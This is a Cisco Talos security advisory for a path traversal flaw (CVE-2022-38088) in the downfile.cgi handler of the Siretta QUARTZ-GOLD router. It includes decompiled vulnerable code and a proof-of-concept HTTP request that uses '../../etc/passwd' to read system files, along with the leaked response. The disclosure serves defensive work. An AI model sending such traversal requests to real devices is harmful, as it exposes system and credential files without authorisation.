CVE-2022-38088: TALOS-2022-1609 || Cisco Talos Intelligence Group

SUMMARY

A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

PRODUCT URLS

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

CVSSv3 SCORE

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

void downfile.cgi(void)

{
  [...]

  _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
  filename = "";
  if (_filename_param != (char *)0x0) {
    filename = _filename_param;
  }
  [... calculate base_folder ...]
  if (*filename != '\0') {
    sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
    send_header(200,buff,"application/tomato-binary-file",0);
    sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
    do_file(buff);                                                                                              [3]
  }
  return;
}

The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2] to compose the string <base_folder>/<_filename>. Then, at [3], the specified file is sent in the HTTP response. From [1] to [2] no sanitization for the _filename parameter is performed, which can lead to a path traversal vulnerability, allowing an attacker to download any file of the file system.

Exploit Proof of Concept

Sending the following request to the web server:

POST /downfile.cgi HTTP/1.1
Authorization: Basic <a valid basic auth>
Content-Length: 55

_filename=../../etc/passwd&_http_id=<the correct tid>

Would result in the web server sending the following response:

HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 03:33:42 GMT
Content-Type: application/tomato-binary-file
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Content-Disposition:attachment;filename="../../etc/passwd"
Connection: close

root:x:0:0:root:/root:/bin/sh
admin:x:0:0:admin:/root:/bin/sh
nobody:x:65534:65534:nobody:/dev/null:/dev/null

The response for this request is the contents of /etc/passwd.

TIMELINE

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.